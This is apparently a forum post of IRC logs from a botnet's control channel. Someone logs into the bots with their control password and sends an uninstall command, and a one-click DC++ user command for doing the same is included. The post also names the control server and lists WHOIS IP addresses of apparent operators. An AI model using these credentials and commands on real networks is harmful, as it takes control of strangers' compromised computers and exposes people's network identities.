    [2009-06-05 14:42] <[B]-43665> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-77981> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-14520> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-26661> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-85365> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-37881> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-36236> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-56145> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-07757> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-57087> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-39000> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-39000> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-06860> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-86515> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-58659> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-40306> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-93786> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-42374> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-34358> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-26614> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-84417> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-77890> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-07922
    [2009-06-05 14:42] *** Parts: [B]-12976
    [2009-06-05 14:42] *** Parts: [B]-13919
    [2009-06-05 14:42] *** Parts: [B]-16425
    [2009-06-05 14:42] *** Parts: [B]-43665
    [2009-06-05 14:42] *** Parts: [B]-77981
    [2009-06-05 14:42] *** Parts: [B]-86328
    [2009-06-05 14:42] *** Parts: [B]-14520
    [2009-06-05 14:42] *** Parts: [B]-26661
    [2009-06-05 14:42] *** Parts: [B]-21387
    [2009-06-05 14:42] *** Parts: [B]-85365
    [2009-06-05 14:42] *** Parts: [B]-37881
    [2009-06-05 14:42] *** Parts: [B]-36236
    [2009-06-05 14:42] *** Parts: [B]-56145
    [2009-06-05 14:42] *** Parts: [B]-07757
    [2009-06-05 14:42] *** Parts: [B]-41736
    [2009-06-05 14:42] *** Parts: [B]-57087
    [2009-06-05 14:42] *** Parts: [B]-39000
    [2009-06-05 14:42] *** Parts: [B]-06860
    [2009-06-05 14:42] *** Parts: [B]-58659
    [2009-06-05 14:42] *** Parts: [B]-86515
    [2009-06-05 14:42] *** Parts: [B]-40306
    [2009-06-05 14:42] *** Parts: [B]-93786
    [2009-06-05 14:42] *** Parts: [B]-60819
    [2009-06-05 14:42] *** Parts: [B]-42374
    [2009-06-05 14:42] *** Parts: [B]-34358
    [2009-06-05 14:42] *** Parts: [B]-26614
    [2009-06-05 14:42] *** Parts: [B]-87295
    [2009-06-05 14:42] *** Parts: [B]-84417
    [2009-06-05 14:42] *** Parts: [B]-77890
    [2009-06-05 14:42] <[B]-86449> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-94559> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-98440> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-45718> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-42513> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-44516> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-82474
    [2009-06-05 14:42] *** Parts: [B]-10588
    [2009-06-05 14:42] *** Parts: [B]-86449
    [2009-06-05 14:42] *** Parts: [B]-09880
    [2009-06-05 14:42] *** Parts: [B]-94559
    [2009-06-05 14:42] *** Parts: [B]-67902
    [2009-06-05 14:42] *** Parts: [B]-45718
    [2009-06-05 14:42] *** Parts: [B]-42513
    [2009-06-05 14:42] *** Parts: [B]-44516
    [2009-06-05 14:42] <[B]-93726> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-99735
    [2009-06-05 14:42] *** Parts: [B]-48704
    [2009-06-05 14:42] *** Parts: [B]-93726
    [2009-06-05 14:42] <[B]-90335> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-81591> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-61481> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-65479> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-46389> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-67509> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-25564> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-97011> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-62234> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-19684> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-90335
    [2009-06-05 14:42] *** Parts: [B]-81591
    [2009-06-05 14:42] *** Parts: [B]-61481
    [2009-06-05 14:42] *** Parts: [B]-65479
    [2009-06-05 14:42] *** Parts: [B]-46389
    [2009-06-05 14:42] *** Parts: [B]-67509
    [2009-06-05 14:42] *** Parts: [B]-25564
    [2009-06-05 14:42] *** Parts: [B]-64521
    [2009-06-05 14:42] *** Parts: [B]-97011
    [2009-06-05 14:42] *** Parts: [B]-62234
    [2009-06-05 14:42] *** Parts: [B]-19684
    [2009-06-05 14:42] *** Parts: [B]-65191
    [2009-06-05 14:42] *** Parts: [B]-14730
    [2009-06-05 14:42] *** Parts: [B]-95220
    [2009-06-05 14:42] <[B]-24866> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-14682
    [2009-06-05 14:42] *** Parts: [B]-24866
    [2009-06-05 14:42] <[B]-57618> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-87604> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-57618
    [2009-06-05 14:42] *** Parts: [B]-87604
    [2009-06-05 14:42] <[B]-86857> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-86857
    [2009-06-05 14:42] <[B]-82006> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-82006
    [2009-06-05 14:42] <[B]-01354> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-01354
    [2009-06-05 14:42] <[B]-15045> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-15045
    [2009-06-05 14:42] *** Parts: [B]-71693
    [2009-06-05 14:42] <[B]-44963> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-12414> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-44963
    [2009-06-05 14:42] *** Parts: [B]-12414
    [2009-06-05 14:42] <[B]-41853> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-41853
    [2009-06-05 14:42] <[B]-47600> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-47600
    [2009-06-05 14:42] *** Parts: [B]-90543
    [2009-06-05 14:42] *** Joins: [B]-19480
    [2009-06-05 14:42] <[B]-22054> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-19480> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-22054> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-22054
    [2009-06-05 14:42] <[B]-19480> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-19480
    [2009-06-05 14:43] *** Connection reset by server

    User command:
    favorites.xml wrote:
    <UserCommand Type="2" Context="2" Name="#hasmocaru Uninstall bot" Command="$To: %[nick] From: %[mynick] $<%[mynick]> .login hasmepeleu|$To: %[nick] From: %[mynick] $<%[mynick]> .remove|" Hub=""/>


    With this user command all you have to do is right click on a bot and select "Uninstall bot",

    Quote:
    [2009-06-05 14:55] *** Connected
    [2009-06-05 14:55] *** Joins: Lithium
    [2009-06-05 14:55] *** Joins: [B]-444137
    [2009-06-05 14:56] *** Looking up your hostname
    [2009-06-05 14:56] *** Checking Ident
    [2009-06-05 14:56] *** Found your hostname
    [2009-06-05 14:56] *** No ident response
    [2009-06-05 14:56] <my.server.name> MODE :Register first.
    [2009-06-05 14:56] <my.server.name> Welcome to the Internet Relay Network [B]-44413
    Your host is my.server.name, running version beware1.5.7
    This server was created Tue Jul 13 2004 at 20:36:17 GMT
    my.server.name beware1.5.7 dgikoswx biklmnoprstv
    MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server
    [2009-06-05 14:56] <my.server.name> NICKLEN=9 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server
    There are 5 users and 0 invisible on 1 servers
    1 :unknown connection(s)
    2 :channels formed
    I have 5 clients and 0 servers
    [2009-06-05 14:56] *** [B]-44413 Highest connection count: 140 (140 clients)
    [2009-06-05 14:56] <my.server.name> MOTD File is missing
    [2009-06-05 14:56] *** [B]-44413 on 1 ca 1(4) ft 10(10)
    [2009-06-05 14:56] *** Joins: [B]-44413
    [2009-06-05 14:56] *** Joins: [B]-11066
    [2009-06-05 14:56] <my.server.name> Channel :Users  Name
    #HElite 3 :
    #hasmocaru 2 :
    End of /LIST

    [2009-06-05 14:56] *** Joins: [B]-88785
    [2009-06-05 14:56] <[B]-88785> [MAIN]: Password accepted.
    [2009-06-05 14:57] *** Parts: [B]-88785
    [2009-06-05 14:57] *** Joins: [B]-65700
    [2009-06-05 14:57] <[B]-65700> [MAIN]: Password accepted.
    [2009-06-05 14:57] <[B]-65700> [MAIN]: Removing Bot.
    [2009-06-05 14:57] *** Parts: [B]-65700
    [2009-06-05 14:58] *** Joins: [B]-28018
    [2009-06-05 14:59] <[B]-28018> [MAIN]: Password accepted.
    [2009-06-05 14:59] <[B]-28018> [MAIN]: Removing Bot.
    [2009-06-05 14:59] *** Parts: [B]-28018
    [2009-06-05 14:59] *** Joins: [B]-29106
    [2009-06-05 14:59] *** Joins: [B]-11066
    [2009-06-05 14:59] *** Joins: [B]-86880
    [2009-06-05 15:00] <[B]-29106> [MAIN]: Password accepted.
    [2009-06-05 15:00] <[B]-86880> [MAIN]: Password accepted.
    [2009-06-05 15:00] <[B]-29106> [MAIN]: Removing Bot.
    [2009-06-05 15:00] <[B]-86880> [MAIN]: Removing Bot.
    [2009-06-05 15:00] *** Parts: [B]-29106
    [2009-06-05 15:00] *** Parts: [B]-86880
    [2009-06-05 15:00] *** Joins: [B]-58013
    [2009-06-05 15:00] *** Parts: [B]-58013
    [2009-06-05 15:02] *** Joins: [B]-58864
    [2009-06-05 15:03] <[B]-58864> [MAIN]: Password accepted.
    [2009-06-05 15:03] <[B]-58864> [MAIN]: Removing Bot.
    [2009-06-05 15:03] *** Parts: [B]-58864
    [2009-06-05 15:06] *** Joins: [B]-13379
    [2009-06-05 15:06] <[B]-13379> [MAIN]: Password accepted.
    [2009-06-05 15:06] <[B]-13379> [MAIN]: Removing Bot.
    [2009-06-05 15:06] *** Parts: [B]-13379
    [2009-06-05 15:09] *** Joins: [B]-33060
    [2009-06-05 15:10] *** Joins: [B]-02310
    [2009-06-05 15:10] *** Joins: [B]-02817
    [2009-06-05 15:11] *** Parts: [B]-02817
    [2009-06-05 15:12] *** Joins: [B]-50998
    [2009-06-05 15:12] *** Joins: [B]-32495
    [2009-06-05 15:18] *** Joins: [B]-49355
    [2009-06-05 15:19] *** Joins: [B]-31317
    [2009-06-05 15:19] <[B]-02310> [MAIN]: Password accepted.
    [2009-06-05 15:19] <[B]-02310> [MAIN]: Removing Bot.
    [2009-06-05 15:19] <[B]-31317> [MAIN]: Password accepted.
    [2009-06-05 15:19] <[B]-31317> [MAIN]: Removing Bot.
    [2009-06-05 15:19] *** Parts: [B]-02310
    [2009-06-05 15:19] *** Parts: [B]-31317
    [2009-06-05 15:19] <[B]-32495> [MAIN]: Password accepted.
    [2009-06-05 15:19] <[B]-32495> [MAIN]: Removing Bot.
    [2009-06-05 15:19] <[B]-33060> [MAIN]: Password accepted.
    [2009-06-05 15:19] <[B]-33060> [MAIN]: Removing Bot.
    [2009-06-05 15:19] *** Parts: [B]-32495
    [2009-06-05 15:19] *** Parts: [B]-33060
    [2009-06-05 15:19] <[B]-49355> [MAIN]: Password accepted.
    [2009-06-05 15:19] <[B]-49355> [MAIN]: Removing Bot.
    [2009-06-05 15:19] <[B]-50998> [MAIN]: Password accepted.
    [2009-06-05 15:19] <[B]-50998> [MAIN]: Removing Bot.
    [2009-06-05 15:19] *** Parts: [B]-49355
    [2009-06-05 15:19] *** Parts: [B]-50998
    [2009-06-05 15:20] *** Joins: [B]-77827
    [2009-06-05 15:20] <[B]-77827> [MAIN]: Password accepted.
    [2009-06-05 15:20] <[B]-77827> [MAIN]: Removing Bot.
    [2009-06-05 15:20] *** Parts: [B]-77827
    [2009-06-05 15:22] *** Joins: [B]-21965
    [2009-06-05 15:22] *** Parts: [B]-21965
    [2009-06-05 15:23] *** Joins: [B]-73983
    [2009-06-05 15:23] *** Joins: [B]-85602
    [2009-06-05 15:24] <[B]-73983> [MAIN]: Password accepted.
    [2009-06-05 15:24] <[B]-73983> [MAIN]: Removing Bot.
    [2009-06-05 15:24] *** Parts: [B]-73983
    [2009-06-05 15:24] *** Parts: [B]-85602
    [2009-06-05 15:24] *** Joins: [B]-03337
    [2009-06-05 15:25] *** Joins: [B]-38188
    [2009-06-05 15:25] <[B]-03337> [MAIN]: Password accepted.
    [2009-06-05 15:25] <[B]-03337> [MAIN]: Removing Bot.
    [2009-06-05 15:25] *** Parts: [B]-03337
    [2009-06-05 15:25] <[B]-38188> [MAIN]: Password accepted.
    [2009-06-05 15:25] <[B]-38188> [MAIN]: Removing Bot.
    [2009-06-05 15:25] *** Parts: [B]-38188
    [2009-06-05 15:27] *** Joins: [B]-30144
    [2009-06-05 15:27] *** Parts: [B]-30144
    [2009-06-05 15:27] *** Joins: [B]-89665
    [2009-06-05 15:27] <[B]-89665> [MAIN]: Password accepted.
    [2009-06-05 15:27] <[B]-89665> [MAIN]: Removing Bot.
    [2009-06-05 15:27] *** Parts: [B]-89665
    [2009-06-05 15:30] *** Joins: [B]-Darky
    [2009-06-05 15:30] <[B]-Darky> .login hasmepeleu
    [2009-06-05 15:30] <[B]-Darky> .login hasmepeleu
    [2009-06-05 15:30] *** Joins: [B]-86027
    [2009-06-05 15:31] *** Joins: [B]-11279
    [2009-06-05 15:32] <my.server.name>
    asdasd 93-113-219-179.urbantelecom.ro * :[B]-Dark
    #hasmocaru
    my.server.name :I'm too lazy to edit ircd.conf
    104 1244204526 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 15:32] *** Joins: [B]-98060
    [2009-06-05 15:32] <[B]-98060> [MAIN]: Password accepted.
    [2009-06-05 15:32] <[B]-98060> [MAIN]: Removing Bot.
    [2009-06-05 15:32] *** Parts: [B]-98060
    [2009-06-05 15:32] <[B]-86027> [MAIN]: Password accepted.
    [2009-06-05 15:32] <[B]-86027> [MAIN]: Removing Bot.
    [2009-06-05 15:32] *** Parts: [B]-86027
    [2009-06-05 15:32] <[B]-Darky> .login hasmepeleu
    [2009-06-05 15:33] <[B]-11279> [MAIN]: Password accepted.
    [2009-06-05 15:33] <[B]-11279> [MAIN]: Password accepted.
    [2009-06-05 15:33] <[B]-11279> [MAIN]: Removing Bot.
    [2009-06-05 15:33] *** Parts: [B]-11279
    [2009-06-05 15:33] *** Joins: [B]-82914
    [2009-06-05 15:33] <[B]-Darky> .log
    [2009-06-05 15:33] <[B]-Darky> .log
    [2009-06-05 15:33] <[B]-Darky> .logout
    [2009-06-05 15:33] <[B]-Darky> .login hasmepeleu
    [2009-06-05 15:33] <[B]-82914> [MAIN]: Password accepted.
    [2009-06-05 15:33] <[B]-Darky> .log
    [2009-06-05 15:33] <[B]-82914> [LOG]: Begin
    [2009-06-05 15:33] <[B]-82914> [06-05-2009 14:25:20] [MAIN]: User: [B]-Darky logged in.
    [2009-06-05 15:33] <[B]-82914> [06-05-2009 14:25:08] [MAIN]: Joined channel: #hasmocaru.
    [2009-06-05 15:33] <[B]-82914> [06-05-2009 14:25:07] [MAIN]: Connected to rocking-dns.no-ip.org.
    [2009-06-05 15:33] <[B]-82914> [06-05-2009 14:24:07] [IDENTD]: Server running on Port: 113.
    [2009-06-05 15:33] <[B]-82914> [06-05-2009 14:24:07] [MAIN]: Bot started.
    [2009-06-05 15:33] <[B]-82914> [LOG]: List complete.
    [2009-06-05 15:34] *** Joins: [B]-20512
    [2009-06-05 15:34] *** Joins: [B]-83591
    [2009-06-05 15:35] <[B]-20512> [MAIN]: Password accepted.
    [2009-06-05 15:35] <[B]-20512> [MAIN]: Removing Bot.
    [2009-06-05 15:35] *** Parts: [B]-20512
    [2009-06-05 15:35] *** Parts: [B]-83591
    [2009-06-05 15:35] *** Joins: [B]-91242
    [2009-06-05 15:35] <[B]-91242> [MAIN]: Password accepted.
    [2009-06-05 15:35] *** Parts: [B]-91242
    [2009-06-05 15:46] *** Joins: [B]-72025
    [2009-06-05 15:46] <[B]-72025> [MAIN]: Password accepted.
    [2009-06-05 15:46] *** Parts: [B]-72025
    [2009-06-05 15:46] *** Joins: [B]-72291
    [2009-06-05 15:46] *** Parts: [B]-72291
    [2009-06-05 15:47] <[B]-82914> [MAIN]: Password accepted.
    [2009-06-05 15:47] <[B]-82914> [MAIN]: Removing Bot.
    [2009-06-05 15:47] *** Parts: [B]-82914
    [2009-06-05 15:48] *** Joins: [B]-63915
    [2009-06-05 15:48] *** Parts: [B]-63915
    [2009-06-05 15:49] *** Joins: [B]-67485
    [2009-06-05 15:49] *** Parts: [B]-67485
    [2009-06-05 15:49] *** Joins: [B]-09867
    [2009-06-05 15:49] <my.server.name> Channel :Users  Name
    #HElite 2 :
    #hasmocaru 5 :
    End of /LIST

    [2009-06-05 15:50] <[B]-09867> [MAIN]: Password accepted.
    [2009-06-05 15:50] <[B]-09867> [MAIN]: Removing Bot.
    [2009-06-05 15:50] *** Parts: [B]-09867
    [2009-06-05 15:52] *** Joins: [B]-84800
    [2009-06-05 15:53] <[B]-Darky> .login hasmepeleu
    [2009-06-05 15:53] <[B]-84800> [MAIN]: Password accepted.
    [2009-06-05 15:53] <[B]-Darky> ce cacat ma
    [2009-06-05 15:54] *** Joins: [B]-69308
    [2009-06-05 15:54] *** Parts: [B]-69308
    [2009-06-05 15:54] *** Joins: [B]-97679
    [2009-06-05 15:55] <[B]-97679> [MAIN]: Password accepted.
    [2009-06-05 15:55] <[B]-97679> [MAIN]: Removing Bot.
    [2009-06-05 15:55] *** Parts: [B]-97679
    [2009-06-05 15:59] *** Joins: [B]-81316
    [2009-06-05 16:00] *** Joins: [-1-]6543
    [2009-06-05 16:00] <my.server.name>
    asdasd 93-113-219-179.urbantelecom.ro * :[B]-Dark
    #hasmocaru
    my.server.name :I'm too lazy to edit ircd.conf
    302 1244206359 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 16:01] *** Parts: [B]-Darky
    [2009-06-05 16:02] *** Joins: [B]-08284
    [2009-06-05 16:04] *** Joins: [B]-55136
    [2009-06-05 16:05] *** Joins: [B]-FrEaK
    [2009-06-05 16:05] <my.server.name>
    FrEaKaZoId 89.45.94.27 * :[B]-23238
    #hasmocaru
    my.server.name :I'm too lazy to edit ircd.conf
    42 1244206636 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 16:06] <[B]-81316> [MAIN]: Password accepted.
    [2009-06-05 16:06] <[B]-81316> [MAIN]: Removing Bot.
    [2009-06-05 16:06] *** Parts: [B]-81316
    [2009-06-05 16:06] <[B]-08284> [MAIN]: Password accepted.
    [2009-06-05 16:06] <[B]-08284> [MAIN]: Removing Bot.
    [2009-06-05 16:06] *** Parts: [B]-08284
    [2009-06-05 16:06] <[B]-55136> [MAIN]: Password accepted.
    [2009-06-05 16:06] <[B]-55136> [MAIN]: Removing Bot.
    [2009-06-05 16:06] *** Parts: [B]-55136
    [2009-06-05 16:07] <[B]-84800> [MAIN]: Password accepted.
    [2009-06-05 16:07] <[B]-84800> [MAIN]: Removing Bot.
    [2009-06-05 16:07] *** Parts: [B]-84800
    [2009-06-05 16:07] *** Joins: [B]-73597
    [2009-06-05 16:07] <[B]-73597> [MAIN]: Password accepted.
    [2009-06-05 16:07] <[B]-73597> [MAIN]: Removing Bot.
    [2009-06-05 16:07] *** Parts: [B]-73597
    [2009-06-05 16:09] *** Joins: [B]-25664
    [2009-06-05 16:09] *** Parts: [B]-25664
    [2009-06-05 16:09] *** Joins: [B]-10970
    [2009-06-05 16:09] *** Parts: [B]-10970
    [2009-06-05 16:12] <my.server.name> Channel :Users  Name
    #HElite 3 :
    #hasmocaru 5 :
    End of /LIST

    [2009-06-05 16:12] *** Joins: [B]-83186
    [2009-06-05 16:12] *** Joins: [B]-88384
    [2009-06-05 16:12] *** Joins: [B]-41448
    [2009-06-05 16:12] *** Parts: [B]-88384
    [2009-06-05 16:12] <[B]-83186> [MAIN]: Password accepted.
    [2009-06-05 16:12] <[B]-83186> [MAIN]: Removing Bot.
    [2009-06-05 16:12] *** Parts: [B]-83186
    [2009-06-05 16:13] <[B]-41448> [MAIN]: Password accepted.
    [2009-06-05 16:13] <[B]-41448> [MAIN]: Removing Bot.
    [2009-06-05 16:13] *** Parts: [B]-41448
    [2009-06-05 16:17] *** Joins: [B]-09301
    [2009-06-05 16:19] <[B]-FrEaK> .login muie
    [2009-06-05 16:21] *** Joins: [B]-21565
    [2009-06-05 16:21] <[B]-21565> [MAIN]: Password accepted.
    [2009-06-05 16:21] <[B]-21565> [MAIN]: Removing Bot.
    [2009-06-05 16:21] <[B]-09301> [MAIN]: Password accepted.
    [2009-06-05 16:21] <[B]-09301> [MAIN]: Removing Bot.
    [2009-06-05 16:21] *** Parts: [B]-21565
    [2009-06-05 16:21] *** Parts: [B]-09301
    [2009-06-05 16:25] *** Parts: [B]-FrEaK
    [2009-06-05 16:26] *** Joins: [B]-97599
    [2009-06-05 16:26] *** Joins: [B]-53022
    [2009-06-05 16:27] <[B]-97599> [MAIN]: Password accepted.
    [2009-06-05 16:27] <[B]-97599> [MAIN]: Removing Bot.
    [2009-06-05 16:27] *** Parts: [B]-97599
    [2009-06-05 16:27] <[B]-53022> [MAIN]: Password accepted.
    [2009-06-05 16:27] <[B]-53022> [MAIN]: Removing Bot.
    [2009-06-05 16:27] *** Parts: [B]-53022
    [2009-06-05 16:29] *** Joins: [B]-30869
    [2009-06-05 16:29] *** Joins: [B]-74082
    [2009-06-05 16:31] *** Joins: [B]-25166
    [2009-06-05 16:32] <[B]-30869> [MAIN]: Password accepted.
    [2009-06-05 16:32] <[B]-30869> [MAIN]: Removing Bot.
    [2009-06-05 16:32] *** Parts: [B]-30869
    [2009-06-05 16:32] <[B]-74082> [MAIN]: Password accepted.
    [2009-06-05 16:32] <[B]-74082> [MAIN]: Removing Bot.
    [2009-06-05 16:32] *** Parts: [B]-74082
    [2009-06-05 16:33] <[B]-25166> [MAIN]: Password accepted.
    [2009-06-05 16:33] <[B]-25166> [MAIN]: Removing Bot.
    [2009-06-05 16:33] *** Parts: [B]-25166
    [2009-06-05 16:37] *** Joins: [B]-86570
    [2009-06-05 16:37] *** Joins: FrEaK
    [2009-06-05 16:41] *** Joins: [B]-09943
    [2009-06-05 16:42] *** Joins: [B]-11254
    [2009-06-05 16:43] *** Joins: [B]-27612
    [2009-06-05 16:43] *** Joins: [B]-69659
    [2009-06-05 16:44] <[B]-11254> [MAIN]: Password accepted.
    [2009-06-05 16:44] <[B]-11254> [MAIN]: Removing Bot.
    [2009-06-05 16:44] <[B]-09943> [MAIN]: Password accepted.
    [2009-06-05 16:44] <[B]-09943> [MAIN]: Removing Bot.
    [2009-06-05 16:44] <[B]-27612> [MAIN]: Password accepted.
    [2009-06-05 16:44] *** Parts: [B]-11254
    [2009-06-05 16:44] *** Parts: [B]-09943
    [2009-06-05 16:44] <[B]-27612> [MAIN]: Removing Bot.
    [2009-06-05 16:44] *** Parts: [B]-27612
    [2009-06-05 16:44] <[B]-69659> [MAIN]: Password accepted.
    [2009-06-05 16:44] <[B]-69659> [MAIN]: Removing Bot.
    [2009-06-05 16:44] *** Parts: [B]-69659
    [2009-06-05 16:44] <[B]-86570> [MAIN]: Password accepted.
    [2009-06-05 16:44] <[B]-86570> [MAIN]: Removing Bot.
    [2009-06-05 16:44] *** Parts: [B]-86570
    [2009-06-05 16:44] *** Joins: [B]-98994
    [2009-06-05 16:44] *** Parts: [B]-98994
    [2009-06-05 16:51] *** Joins: [B]-99012
    [2009-06-05 16:57] <[B]-99012> [MAIN]: Password accepted.
    [2009-06-05 16:57] <[B]-99012> [MAIN]: Removing Bot.
    [2009-06-05 16:57] *** Parts: [B]-99012
    [2009-06-05 16:58] *** Joins: [B]-51838
    [2009-06-05 16:59] <[B]-51838> [MAIN]: Password accepted.
    [2009-06-05 16:59] <[B]-51838> [MAIN]: Removing Bot.
    [2009-06-05 16:59] *** Parts: [B]-51838
    [2009-06-05 17:00] *** Joins: [B]-13737
    [2009-06-05 17:02] <[B]-13737> [MAIN]: Password accepted.
    [2009-06-05 17:02] <[B]-13737> [MAIN]: Removing Bot.
    [2009-06-05 17:02] *** Parts: [B]-13737
    [2009-06-05 17:05] *** Joins: [B]-77039
    [2009-06-05 17:05] *** Parts: [B]-77039
    [2009-06-05 17:08] *** Joins: [B]-00034
    [2009-06-05 17:08] *** Joins: [B]-36334
    [2009-06-05 17:08] <[B]-00034> [MAIN]: Password accepted.
    [2009-06-05 17:08] <[B]-00034> [MAIN]: Removing Bot.
    [2009-06-05 17:08] *** Parts: [B]-00034
    [2009-06-05 17:08] <[B]-36334> [MAIN]: Password accepted.
    [2009-06-05 17:08] <[B]-36334> [MAIN]: Removing Bot.
    [2009-06-05 17:08] *** Parts: [B]-36334
    [2009-06-05 17:10] *** Joins: [B]-22345
    [2009-06-05 17:15] *** Joins: [B]-13382
    [2009-06-05 17:15] *** Joins: [B]-36635
    [2009-06-05 17:16] <[B]-13382> [MAIN]: Password accepted.
    [2009-06-05 17:16] <[B]-13382> [MAIN]: Removing Bot.
    [2009-06-05 17:16] <[B]-36635> [MAIN]: Password accepted.
    [2009-06-05 17:16] <[B]-22345> [MAIN]: Password accepted.
    [2009-06-05 17:16] <[B]-22345> [MAIN]: Removing Bot.
    [2009-06-05 17:16] *** Parts: [B]-13382
    [2009-06-05 17:16] *** Parts: [B]-22345
    [2009-06-05 17:16] <[B]-36635> [MAIN]: Removing Bot.
    [2009-06-05 17:16] *** Parts: [B]-36635
    [2009-06-05 17:16] *** Joins: [B]-69898
    [2009-06-05 17:16] *** Parts: [B]-69898
    [2009-06-05 17:20] *** Joins: [B]-48746
    [2009-06-05 17:21] <[B]-48746> [MAIN]: Password accepted.
    [2009-06-05 17:21] <[B]-48746> [MAIN]: Removing Bot.
    [2009-06-05 17:21] *** Parts: [B]-48746
    [2009-06-05 17:21] *** Joins: [B]-34603
    [2009-06-05 17:22] *** Joins: [B]-11302
    [2009-06-05 17:23] *** Joins: [B]-61714
    [2009-06-05 17:24] *** Joins: [B]-09380
    [2009-06-05 17:26] <[-1-]6543> .login hasmepeleu
    [2009-06-05 17:26] <my.server.name>
    asdasd 93-113-219-179.urbantelecom.ro * :[B]-Dark
    #hasmocaru
    my.server.name :I'm too lazy to edit ircd.conf
    107 1244206359 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 17:26] <[B]-61714> [MAIN]: Password accepted.
    [2009-06-05 17:26] <[B]-09380> [MAIN]: Password accepted.
    [2009-06-05 17:26] <[B]-11302> [MAIN]: Password accepted.
    [2009-06-05 17:26] <[B]-34603> [MAIN]: Password accepted.
    [2009-06-05 17:28] *** Joins: [B]-28889
    [2009-06-05 17:28] <FrEaK> ma da cplm
    [2009-06-05 17:28] <FrEaK> au mai ramas atatia nu imi explic
    [2009-06-05 17:28] <my.server.name>
    ~freakazoi 89.45.94.27 * :freakazoid User
    #hasmocaru
    my.server.name :I'm too lazy to edit ircd.conf
    3 1244208570 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 17:29] <[B]-61714> [MAIN]: Password accepted.
    [2009-06-05 17:29] <[B]-61714> [MAIN]: Removing Bot.
    [2009-06-05 17:29] *** Parts: [B]-61714
    [2009-06-05 17:29] <[B]-09380> [MAIN]: Password accepted.
    [2009-06-05 17:29] <[B]-09380> [MAIN]: Removing Bot.
    [2009-06-05 17:29] *** Parts: [B]-09380
    [2009-06-05 17:29] *** Joins: [B]-86363
    [2009-06-05 17:29] <[B]-11302> [MAIN]: Password accepted.
    [2009-06-05 17:29] <[B]-11302> [MAIN]: Removing Bot.
    [2009-06-05 17:29] *** Parts: [B]-11302
    [2009-06-05 17:29] <[B]-34603> [MAIN]: Password accepted.
    [2009-06-05 17:29] <[B]-34603> [MAIN]: Removing Bot.
    [2009-06-05 17:29] *** Parts: [B]-34603
    [2009-06-05 17:29] <[B]-86363> [MAIN]: Password accepted.
    [2009-06-05 17:29] <[B]-86363> [MAIN]: Removing Bot.
    [2009-06-05 17:29] *** Parts: [B]-86363
    [2009-06-05 17:29] *** Joins: [B]-05741
    [2009-06-05 17:30] *** Parts: [B]-05741
    [2009-06-05 17:30] <[B]-28889> [MAIN]: Password accepted.
    [2009-06-05 17:30] <[B]-28889> [MAIN]: Removing Bot.
    [2009-06-05 17:30] *** Parts: [B]-28889
